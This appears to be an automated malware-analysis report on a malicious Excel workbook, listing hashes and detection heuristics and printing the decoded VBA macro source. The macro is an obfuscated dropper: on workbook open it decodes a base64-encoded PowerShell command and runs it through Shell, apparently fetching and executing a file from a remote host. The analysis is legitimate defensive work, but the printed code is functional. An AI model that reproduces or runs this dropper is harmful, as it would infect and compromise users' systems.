Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b8548a2a9270b78a…

MALICIOUS

Office (OOXML)

30.8 KB Created: 2018-02-06 02:47:44 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-02-23
MD5: 449986069fa050dc1580db6f5ba1dfca SHA-1: 4af90a7cac0a842e1d962c592c100f372d45e8a3 SHA-256: b8548a2a9270b78ace6511b425b62dc1315ca82412622b6f244017651e196955
290 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6442671-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6442671-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ujJoUYppBnLKtVHRtxixsYzhpaFc(Urarx), MUtvfDszfbYaZLEjhyyOubCftNfWjbzuSMcguPfpdHlSYHXgTQzqcrilSOBRYWQDbeHNiYpRTIkmqjGmqyCTcJSberO
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
     Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub workbook_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 17414 bytes
SHA-256: b5bd099494eae0ac462153091a9f55c759c1a97cac54bf6b71143c65e53a6402
Detection
ClamAV: No threats found
Obfuscation or payload: likely
170 of 205 identifiers look randomly generated (e.g. 'yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhd') — consistent with name-mangling obfuscation. Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()


UqmK.cVQOFprcPFwMmqjsixzl
Dim VsKsfPXcShbqXrMZLtiVCbttbUroaAvJBncjLXiqRPKheFovdKhp As Integer
If 57 = 32 Then
Dim OeitzQQLYjBRlRokOcOnKsDnRLOVfwKPTG As Date
Dim uXEjkuHWSiNswNREgAwteWavcnBugbYmyfWQffsTgoaVZYPBEbPJSZbYxJG As String
End If
Dim wsMqqJbuQqAYBIdNqvEVDYzqEMOTYDxTWYvbUxkLy As Integer
If 50 = 47 Then
Dim eyLEDNBpMlcsnDYsWldvHWNsgCcMBtsLtXZaolByNdLRVbi As Date
Dim UXixMGQqHkSYAkonTsRzQexEkjfheLvXFTIpTvgFcgRpWN As String
End If
Dim ANZprYDcRqZeNcbiMwpuTgcyUYMLWkNIiXiRIoTWTc As Integer
If 46 = 53 Then
Dim CRPpiDdtUUzbtTkaVTMsFhdQvptKaXdSbqeKjeqJi As Date
Dim dPsJHdOghSAKbXUoytsJTSwrhzDparrcCKcRkHoLedtFdH As String
End If
Dim zSJWklxzOKSBbHZZGqbXIRvCDqEgfqZrOaAlfEGGeDvSyjghlFXDdFziX As Integer
If 57 = 49 Then
Dim GSugRUYkbnBGotCjVsFVdDUKWuZSVNIaSN As Date
Dim YlMZNiXhXweaxLVTINuMuCyjJWuFPNeaobVQXveWywgXf As String
End If
Dim vxOxCFugGTVncQrnRSJSEmVqFwMiXNxWaENYgIMIjuiHzcu As Integer
If 42 = 37 Then
Dim fniheWFbJbYrGsMIsVzM As Date
Dim YCSHIFBiJDOrcBhvpgTzVdDwHRGPXmqlzPWcUaYYV As String
End If


Dim XRGNhOFKQTLCArvyWzrzlKXNcrNfEbOIvdyLxjaCBEGSej As Integer
If 39 = 43 Then
Dim zXadybgZkMtskpBZFpEDHWtjBmZpygEEj As Date
Dim tspEbdnbVtmRFykAbzROacceqcLBrbDHoJrwMVeMRc As String
End If
Dim lcGRvnopWhmqJQQKNyRlkuqecwHooGUEwyrzXY As Integer
If 51 = 58 Then
Dim hXNCEWUyzagBHgu As Date
Dim grqmcozgABQNitLZQmoRtXipUJewgHmynK As String
End If
Dim QGANvjhqNBnImEoBQPSPBIJBSTKDAsOS As Integer
If 32 = 51 Then
Dim ZYdEZCrEjCKhCLWZHfqXfXIIwyucZeqUmViObjb As Date
Dim NYNgyyczHwkvVCrmCPUIaIOfFMpvgcHxXDdyRrKKUznfoiV As String
End If
Dim SuigzGbAFJialIhSeonXRZsUKEKoaUjrXrXAx As Integer
If 43 = 34 Then
Dim vIqwDXpjRZBmhIrBKEtBNVvwnalZqDukgUjgwbOBClt As Date
Dim eJBtLspMmezkZMuJcmPsNeRGMZKFjqrycbQnlgZhBqHGhkJTBSlPns As String
End If
Dim gAsvglhkdwnAHywHXwMirXWKYbQrDRFbLjvQvpAnAQN As Integer
If 46 = 46 Then
Dim LTgdLXtuoDEBIdhWEVqhMrLpXCgMiwYhbKLrsyETJWQYGimmNTvS As Date
Dim KiAUHqFJqhMseXZyRpeFQWXpbmioPtyOAGXsJrjBtvccKX As String
End If


End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UqmK"
Dim AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa As String
Dim evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb As String
Sub cVQOFprcPFwMmqjsixzl()

 On Error Resume Next
Dim eSGCqpoYXcKtALsTkrxENLVaIIrIQvoAPtkttHsLjjdK As Integer
If 55 = 35 Then
Dim zstekkvneOlSxfthygH As Date
Dim bnKeHbyZdylVdhKbPPNXgAAWBHRvONKNCbBXpOmCmKRpssHknEeSkIa As String
End If
Dim bmnczJCLPoXSBfnlBdKlWiLdIzgIKjrcuAalCm As Integer
If 34 = 38 Then
Dim mtjzCAVaFFASdpaWEsaJUAcuAgwvYAFBiOqRCWgLIit As Date
Dim bIrGCCXwhLsSmQpyVEZCFzyjOzIUiMOAlGBlJZu As String
End If


 
Dim sAEXqqwEBMYKHigobKHsDtDOVwrgfODpwKhBAcHtRvHHJBHSFSZbBhqywq As Integer
If 30 = 52 Then
Dim CuyQYmIjOwBeozCNbImwEToZaNpcnOTiEJZNvAWVya As Date
Dim nLQbdZYoGiMAmiFYpKwgvzdSZeapSalRxdgdJzjQDzIkWEXrHXKMYRe As String
End If
Dim nhxBzzjVgxvCJBcOqagcwqswVHihvPZsfysvLxk As Integer
If 55 = 47 Then
Dim QTdcnaBNpeIUlsoixpAgrQBaQYDWKJgDtpPJTOEWTtsCmvnArQvG As Date
Dim KRtzSCLPXeCgyEbvcfOjkeMxXynVkCfuOasbwPqQCpypqMEhUrXLBLVgE As String
End If

 bHkRfRbcBnpvdvZLEhgMKzufkERzpAAVdREtWbOUXtgJpdVsScpZrWKcMFgaAb
Dim vcTPqeUyIRXMzzNoyhufXHLuFBsfUtCEMXAnXBLKeqivgVUsKWDeaAg As Integer
If 42 = 33 Then
Dim oQZJompeOPTzbyZRwVkBhYQNkgzVypXdMqMWysXYoLTfNW As Date
Dim tukFGJqyzPALZImUfYrpnllDSEyLMVEkz As String
End If
Dim OnFktiNmNrwVmTPmUgunXiHIhmCLfldLQMKUgjmpdCZup As Integer
If 30 = 37 Then
Dim hfkiZrpJwbffxCGgCHcNlEaIuFltFKVJNSAHRcGtoBUkfojggJbvx As Date
Dim hEcEcoTGvEmGVReCyOZBiYjkqdFWENviZMgOXCp As String
End If

End Sub
Function ujJoUYppBnLKtVHRtxixsYzhpaFc(evwZFvXBHfAongtWeGVZwpvxjqrQQwHmzXFNbhCOgDLLjAMryguaUnao)
Dim omnswheJWFehvCtOIUsOzixCiJEgIlPfv As Integer
If 56 = 52 Then
Dim ZlOufmCLTiQafAggxYtf As Date
Dim opFplKndxAlpylVQeTchpCgzgbCIXALNVzHjfZJV As String
End If
Dim zYOSxbbuePBdvMqlJFIJHeFxpYTyemkFKHiQoNCFAIeIyhRJJVZ As Integer
If 57 = 39 Then
Dim aQAOUSQcYHcQsevTndZxvCDIyAxy As Date
Dim IGJpIMKoJsNxYldxXsleCNdgjYeXMrPTVRTSynHfUHKvPcZJYGlGPTv As String
End If
 Dim iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS
Dim vcdFkimcRducGSLzjkFKvDiQHzUyGGJEBWYpUiXxhesSVASrNHBVJJzstN As Integer
If 30 = 30 Then
Dim xkNnWLTpakuVeBNIcRKQuHgclyEousWgwHkmjtIgyga As Date
Dim ixrcAHBgihcTqElCXHeuhNOZXQaYjIeRN As String
End If
Dim gxetVDgtLnyTntiyrkZTlsVjSFjhdxaDLFJGGIBExB As Integer
If 39 = 49 Then
Dim VaPGjWrasYFxcocvbQTzQONvIikcri As Date
Dim iUWkXuUMVNpCFCyNcVeLhlkykGNUxBmPiJpkbsQibOvGKNJLwuFOygBxkYz As String
End If
   AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa = "MS" & "XM" & "L2." & "DOMDocument"
Dim QhzOUaZUvNOlkEvjSqdnXxCXCvXRBIrzDsAAbAagltN As Integer
If 33 = 52 Then
Dim yiJUKCwiHGkcTecLZDHSnVOhsDvISPxCejEotaNPFZjtTQhWyoBdd As Date
Dim aacUbcGHnQsIiyjaoSyqsNNlUObWYJdOUYDJbTRyGIRJrkk As String
End If
Dim SxvKVDnlNMqzNAjidmeoJuayUBAjjvE As Integer
If 51 = 45 Then
Dim ukdJZdzHLhnpwlU As Date
Dim DxWanWNwbXWwqUDDBSIvPkqKEeeSGVFeNzxCMJI As String
End If
 
Dim hgnCmCgInHemXopETGLVIsuqFSsjqXAqsKaPbh As Integer
If 56 = 43 Then
Dim EIXVrKcjipXudvBnzpmxwUJxSPHn As Date
Dim tMOadlCCxnAjNVjCLvtFpELkcekkzaDbDopV As String
End If
Dim bxRrtyqLoCjbkGlWVBypBdxzBRDWjZf As Integer
If 37 = 48 Then
Dim YfOaOeCMrOzwZuJAspgGCqATyzS As Date
Dim qbuTbPXKvVfWsToGbChXErQKhDTdifucP As String
End If

  
Dim LLkwvXgCjNeNSomNjZRQbNzKklYwtcQbDHgHDKgeAU As Integer
If 46 = 38 Then
Dim UdmxPPgPyGcLoyMaLJzkJHxDJLHfKZsmQGsVYmWJPeeKyrSiudzWfQLNgin As Date
Dim DHBFZNqvhFrBZnpUecmESsZkgaWHAuepqzSBOZFxIwlcDcajpvhktdVLiRY As String
End If
Dim zriunbBLZVoFEXpwWHxgEAmREMtwMeGTxBFGZBxABRAOApcNDhyEkkU As Integer
If 42 = 44 Then
Dim zERqahFyvOVIDRjXUJwemzYQOjgsffCiMgGBHKXTw As Date
Dim SEzfhZvTJeuoGhzfAbqANTQLnvXLhPJmdiTvZlgKlZVBItGyHW As String
End If
 Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa)
Dim HjgSizoormCkluUILYOEGPufOnyPDupYDLIa As Integer
If 40 = 57 Then
Dim GKzUHktuIBnbgzihkDQroAEvBYkxwdgaltCBYtwVVAXMAXiDLHoAuR As Date
Dim mFFETiAvxfVNpmxgJqGvVodrudpglppfgUHwvUaOUaCrrmhvFfyxuyvx As String
End If
Dim cOJpsTKIqphUfBlpQrbvmlzHwtbGqrlhZJUhKkVBPtBCFNQEtJhCXALqOBt As Integer
If 34 = 56 Then
Dim zsDRyDzvVgEefWZfsjxCidWNhJjJYydSIrWIMbD As Date
Dim yFRvXpeBfxUTHRzKVVqkoTqWXDlVoAQTRgzwQi As String
End If


  Dim yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX
Dim zXCIELEfWBJgAnWrOePvXUDJNfhBBb As Integer
If 42 = 39 Then
Dim RDtnWShgPeSsgkMHzdxaRUgVKeTtuZeCdvjFnNRDJhOkcfnSwGfDEbJxWYc As Date
Dim rznmqAQOlBGUmLtQkFvsfqAwntaxBmmiOkZEVvYkMQCRpmt As String
End If
Dim rKKYrbfxAyrzxZSNzOYFBmpvphLgOojH As Integer
If 47 = 50 Then
Dim AAinqNvHjnYGevbKuDCCRhrFUPjJPziMO As Date
Dim kywqfWlTRWONjQtGAmLlgpTJdSadmsk As String
End If
  Set yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX = iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS.createElement("ZyAAjwNlQhWbFau")
Dim EMruxeTOgRjALdskyqCOMXaiuenNMvHhYlJ As Integer
If 50 = 40 Then
Dim AsWvchXfUxpIfkhcnjdXhmJA As Date
Dim SrGBkJBbZUrscuZhprFkEWHcfTUxvObOjWdlaVuLvOiLto As String
End If
Dim AtJwipgYvvjdWQpEfLsdJFQoGTxupqnwjqTanzglhKbhBxzdVriXTPfu As Integer
If 55 = 52 Then
Dim cVpOsmjFIntfxOQgfGwyejnJUTYxHPdULZxSKRsubWZODTgHaBsMShQ As Date
Dim thgtZNlxsKZUYQyWNOBXIJZFBnRXGWRBdIEkdXThpYgDeyIqbffy As String
End If
  evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb = Chr(268 - 170) & Chr(182 - 77) & Chr(460 - 350) & Chr(311 - 265) & Chr(463 - 365) & Chr(118 - 21) & Chr(295 - 180) & Chr(369 - 268) & Chr(81 - 27) & Chr(107 - 55)
Dim RJHjIasmwNrVtXqPMNspuUhjdVaCebvarSkUAVcDfhlchLKHH As Integer
If 36 = 57 Then
Dim sdNmpDwcYGmApHURQeamWOrlpJMjF As Date
Dim BSLTvlxhoBPnrcPpDqaQKRgkUlemcxfr As String
End If
Dim NXXnbguVXkccLzfmcwmTmSvjlayKHKFqVYZUEbNWwFsapEZVFsKgKMEub As Integer
If 59 = 47 Then
Dim nCBikNMelGmZKhBiQWgaVugBdEOAZfJTe As Date
Dim sRYMnMrgvDymvvLJxupYUGtWzEfzMFFwTuSQ As String
End If
  yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.DataType = evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb
Dim cWcKpuZqiPhIDrclTvKlXCMigsTqyBSBcvgaSeiahCojXWwVdUdYkgsaK As Integer
If 40 = 32 Then
Dim texajsgxggHKBToMjEVOcLJwyNeYtQwDGQYAlAxKHmrqoKbAoMBbXLhiUAb As Date
Dim WNIDPjEDluoajHKHqUSHnmdjhPUgujqfk As String
End If
Dim YbwyjbHjHpGAlRUMEqNCtojkYVAOYJ As Integer
If 37 = 38 Then
Dim CEIpKfNIGsLYgwXjvxATpscdrjrMaNbtL As Date
Dim ynCrvHpzwkVrVInMoaCOFTKbfybnAhtRRMiJVszqLUtIHmWbEAlnYfFe As String
End If
  yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.Text = evwZFvXBHfAongtWeGVZwpvxjqrQQwHmzXFNbhCOgDLLjAMryguaUnao
Dim daMxfByOqDZIaerwaMCkaBTsczjAwGsmGDgufC As Integer
If 51 = 32 Then
Dim KJVeRDMOBaIpMMcVEbGTVgRySkKmBWywQXBsPwj As Date
Dim QfNyJrGtgKlyEnLhesXLhsaNebMYpKjFIrqoHiIGMqebP As String
End If
Dim XtIEpXArkCXFAThfiDVafqNxXZvjQzqOyyGiDUzmjOXpTi As Integer
If 59 = 50 Then
Dim HOabenIAjhgLgQcQalLJGCMzcNEjr As Date
Dim RSYeoSgIpUDFxOZBrnjKSnldKcECby As String
End If
  ujJoUYppBnLKtVHRtxixsYzhpaFc = yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.NodeTypedValue
Dim QiZJROIhrxvHlRIDInnykaUYZehuUMNehq As Integer
If 41 = 59 Then
Dim EUgoxKsKvmPKCUUGUROdOpNAjnhNNfjQauMnWTqdFafiJPcMZN As Date
Dim swPEcPGgFKcfxQCykHIhkAblYoKfrTKUnznmBVRxgqNfAZcPf As String
End If
Dim LfUEsdrVdgoEbolzHrxcQwOqLAtnvlyLvzgoqQvWwRXodsFBbgsie As Integer
If 44 = 59 Then
Dim mPOQetrkEasicJbIxJrvbgyZZMTvrLOsPgJkRXLXDmrreGBidseXBmD As Date
Dim FQprSawstLASvArrZxUspoHuTLkRygrqddDTcgtwGtyfenFhlB As String
End If

End Function

Sub bHkRfRbcBnpvdvZLEhgMKzufkERzpAAVdREtWbOUXtgJpdVsScpZrWKcMFgaAb()
MUtvfDszfbYaZLEjhyyOubCftNfWjbzuSMcguPfpdHlSYHXgTQzqcrilSOBRYWQDbeHNiYpRTIkmqjGmqyCTcJSberO = 0
Dim EZhuNQJuYHpetMTJpRxYOtDXlvqbPfFCf As Integer
If 59 = 38 Then
Dim wcSJjQmJhImHcAmMUynkNnKV As Date
Dim JIRaiesBmzwkBzGBKPglRQJvDPvgRSSJR As String
End If
Dim wAayLbCPlUdDBKUrmayHZEtzWWSjMjUgnTFzgDyndVgvgsCEaofrUC As Integer
If 47 = 41 Then
Dim rsGbboITDBAwQiFVLib As Date
Dim KdDXyTeUNJXEcMkbMsFbJeKSfvjbTzEdxQJYnUIHxTvJf As String
End If

Urarx = Urarx & "QwBtAEQAIAAmACAALwBDACAAQwBEACAAQwA6ACAAJgAgAFAATwBXAGUAUgBzAGgARQBsAGwAIAAtAGUAbgBDAG8AZABlAGQAQwBPAE0AbQBhAE4AZAAgAFoAZwBCADEAQQBHADQAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMAQQBBAFUAUQBCAHoAQQBFAHcAQQBjAEEAQgBCAEEARQBRAEEAWQB3AEIAYQBBAEYAbwBBAFQAZwBCAEYAQQBGAEkAQQBiAGcAQgA0AEEARwBJAEEAUQB3AEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAG8AQQBUAGcAQgBpAEEARgBvAEEAYQBRAEIAagBBAEUAVQBBAFEAZwBCAE8AQQBGAFUAQQBXAGcAQgBJAEEARwBrAEEAYgBnAEIARABBAEYAawBBAGMAZwBCAHMAQQBHADQAQQBUAEEAQQBnAEEAQwB3AEEASQBBAEEAawBBAEgAQQBBAFIAdwBCAEwAQQBHADgAQQBUAHcAQgBXAEEASABRAEEAVABRAEIARgBBAEYAZwBBAFoAUQBCAGwAQQBHAFkAQQBZAFEAQgA2AEEASABJAEEAWgBRAEIAdQBBAEcATQBBAGIAdwBCAHYAQQBDAEEAQQBLAFEAQgA3AEEAQwBnAEEAVABnAEIAbABBAEgAYwBBAEwAUQBCAFAAQQBHAEkAQQB"
Dim wXkfHscGGRfTlsCjCBOEuHMCLnskxepjAmiXywLHcWqydFCcF As Integer
If 47 = 40 Then
Dim YuSgElpLiTTzsJc As Date
Dim bwSyJfkGpHcXQNYGkQeYjXCwBtMQcsHjNOXhnESanocZ As String
End If
Dim bNZxKNijOksEtVxQSUexztKBqqSgyDlvucUnTOFPJXVcWToRHBHSKfZiD As Integer
If 34 = 40 Then
Dim XHTuClKyxJQBJwEOPocXifXCBZwwSlPDljwHmUHmLdYKXQxEDEv As Date
Dim rxKVsjRtcoOgMtNPZAwcugqMEGNflcrsOqYFbOEXUbexw As String
End If
Urarx = Urarx & "hAGcAQgBsAEEARwBNAEEAZABBAEEAZwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwA0AEEAVABnAEIAbABBAEgAUQBBAEwAZwBCAFgAQQBHAFUAQQBZAGcAQgBEAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAHAAQQBDADQAQQBSAEEAQgB2AEEASABjAEEAYgBnAEIAcwBBAEcAOABBAFkAUQBCAGsAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEASwBBAEEAZwBBAEMAUQBBAGUAZwBCAE8AQQBHAEkAQQBXAGcAQgBwAEEARwBNAEEAUgBRAEIAQwBBAEUANABBAFYAUQBCAGEAQQBFAGcAQQBhAFEAQgB1AEEARQBNAEEAVwBRAEIAeQBBAEcAdwBBAGIAZwBCAE0AQQBDAEEAQQBMAEEAQQBnAEEAQwBRAEEAYwBBAEIASABBAEUAcwBBAGIAdwBCAFAAQQBGAFkAQQBkAEEAQgBOAEEARQBVAEEAVwBBAEIAbABBAEcAVQBBAFoAZwBCAGgAQQBIAG8AQQBjAGcAQgBsAEEARwA0AEEAWQB3AEIAdgBBAEcAOABBAEkAQQBBAHAAQQBEAHMAQQBLAEEAQgBPAEEARwBVAEEAZAB3AEEAdABBAEUAOABBAFkAZwBCAHEAQQBHAFUAQQBZAHcAQgAwAE"
Dim xMQJAXEHbAKHxQlWmIzxVRWUHoLwZHTCtPGuwVkFnlmpOydySBiSeAbfp As Integer
If 38 = 37 Then
Dim wCMLHiUhHNiJqZRXuJkfgFILNdXZAXtob As Date
Dim FASYtfDSIHkvocbRukqqAIqtAyeKvgkU As String
End If
Dim tilZyzAdhNYyXQYAwHGnCxbwJZXuBtXcXQBFrBTvjMJmks As Integer
If 40 = 38 Then
Dim VkadNnawRvHoQYbFbnqwbHOSJvoKDp As Date
Dim noMREmUYgjCayFyCluTdkWwnQNVHTRyPtcIScyU As String
End If
Urarx = Urarx & "EAQwBBAEEATABRAEIAagBBAEcAOABBAGIAUQBBAGcAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEEAdQBBAEUARQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBqAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHAAQQBDADQAQQBVAHcAQgBvAEEARwBVAEEAYgBBAEIAcwBBAEUAVQBBAGUAQQBCAGwAQQBHAE0AQQBkAFEAQgAwAEEARwBVAEEASwBBAEEAZwBBAEMAUQBBAGMAQQBCAEgAQQBFAHMAQQBiAHcAQgBQAEEARgBZAEEAZABBAEIATgBBAEUAVQBBAFcAQQBCAGwAQQBHAFUAQQBaAGcAQgBoAEEASABvAEEAYwBnAEIAbABBAEcANABBAFkAdwBCAHYAQQBHADgAQQBJAEEAQQBwAEEARABzAEEASQBBAEIAOQBBAEEAMABBAEMAZwBCADAAQQBIAEkAQQBlAFEAQgA3AEEAQQAwAEEAQwBnAEIAcgBBAEcAawBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgB3AEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBHADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEIARgBBAEYAZwBBAFEAdwBCAEYAQQBFAHcAQQBPAHcAQQBnAEEAQQAwAEEAQ"
Dim olDHGuBIJUGJtrZERsYAqRNEOlmhWxgamaeshOptPFMnN As Integer
If 38 = 41 Then
Dim IFXTXqaDyeXXytVHUmMngXTMhXDCeklEarFfONzGGWowHVj As Date
Dim UUmvSzzgkmLmzmXZNsSxGnpsGmFhJjWFMoihspSEbKVtDbzUixaDo As String
End If
Dim XcgetpfuRXBPFaLDpgYaNVvSwpenlzLJTQoMBD As Integer
If 43 = 56 Then
Dim yzmKJnUdxBoQsRBcaCgOiEKsJSLswplzBm As Date
Dim hYoDMIySrdzUGuHqqmfnUuptArbchIPoOFjcoXpXQQMhtpLRkG As String
End If
Urarx = Urarx & "wBnAEEAawBBAEgATQBBAFcAQQBCAGgAQQBIAE0AQQBlAGcAQgAzAEEARwAwAEEAWQBnAEIAegBBAEcARQBBAFIAUQBCAFUAQQBIAFkAQQBZAFEAQgA1AEEARwBNAEEAVgBnAEIATgBBAEUAZwBBAGIAQQBCADIAQQBFAEkAQQBhAEEAQgBzAEEARgBVAEEAUABRAEEAawBBAEcAVQBBAGIAZwBCADIAQQBEAG8AQQBWAFEAQgBUAEEARQBVAEEAVQBnAEIAUQBBAEYASQBBAFQAdwBCAEcAQQBFAGsAQQBUAEEAQgBGAEEAQwBzAEEASgB3AEIAYwBBAEcAdwBBAFcAQQBCADEAQQBFAGcAQQBSAGcAQgBsAEEARwBrAEEAYwBBAEIAVgBBAEUAOABBAFEAdwBCADIAQQBGAGMAQQBaAEEAQgBoAEEARgBFAEEAZQBBAEIAdwBBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQA3AEEAQQAwAEEAQwBnAEIAUgBBAEgATQBBAFQAQQBCAHcAQQBFAEUAQQBSAEEAQgBqAEEARgBvAEEAVwBnAEIATwBBAEUAVQBBAFUAZwBCAHUAQQBIAGcAQQBZAGcAQgBEAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBIAE0AQQBPAGcAQQB2AEEAQwA4AEEAWQB3AEIAcwBB"
Dim yzTOSmjuCVhVkjNKGAKeBSwIWDhHALfJraJQUznwtuUUpufdTiiLGGFgDLs As Integer
If 48 = 47 Then
Dim PFctrpXeKZxpGNNlGxbSbXEnRcUCkVdMJHYrRBdfSQVDWscxtVy As Date
Dim ictQrAobOVUtowkgzpVUFUwALBBRZAWJPXvkQqgrc As String
End If
Dim ZPJxWhGlLcHXBsNgsFpzXCNyKeRBAQIIergEmCpUufNYOm As Integer
If 30 = 59 Then
Dim OehDXlrsFXBLmsQFlvTzsJMJuqPUE As Date
Dim ropjYPmUwtXQmlICaQwEpuREPuERXJhVWnNiMbOcdkoCwiFYDGTa As String
End If
Urarx = Urarx & "AEMANABBAGIAQQBCADUAQQBDADgAQQBNAFEAQgBQAEEARABJAEEAYwBRAEEAeABBAEUAYwBBAE0AUQBCAG4AQQBEAE0AQQBOAGcAQQB6AEEARgBBAEEATAB3AEIAawBBAEcAOABBAGQAdwBCAHUAQQBHAHcAQQBiAHcAQgBoAEEARwBRAEEATAB3AEIAQwBBAEYAbwBBAFMAQQBCAFEAQQBFAEkAQQBRAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAE0AQQBXAEEAQgBoAEEASABNAEEAZQBnAEIAMwBBAEcAMABBAFkAZwBCAHoAQQBHAEUAQQBSAFEAQgBVAEEASABZAEEAWQBRAEIANQBBAEcATQBBAFYAZwBCAE4AQQBFAGcAQQBiAEEAQgAyAEEARQBJAEEAYQBBAEIAcwBBAEYAVQBBAE8AdwBBAE4AQQBBAG8AQQBEAFEAQQBLAEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQA9AA=="
Dim TQPxWlTdKUwmMBtyXaqzBTaEFPIgogNRqHCGYQLbHkRJoBquo As Integer
If 33 = 34 Then
Dim HAdQUYzpKrHcnpeGewEznaHOOrRCRPD As Date
Dim ZNshgkBWiDQNYEyUvnCJFluBgsPBdGxYuohPuIxWdZVwWNiKQWWO As String
End If
Dim OGxoTqAnUAtcFsSkWjanpgggPxfTJFkGkiKoqtvDHKBcgtqduynhwj As Integer
If 52 = 55 Then
Dim YiZRYVLhdPQmrXieudnW As Date
Dim ffeEAVHBZLRDKBKbPYUasZglMtCTvQEKtZDsDVRDOKISxM As String
End If
 
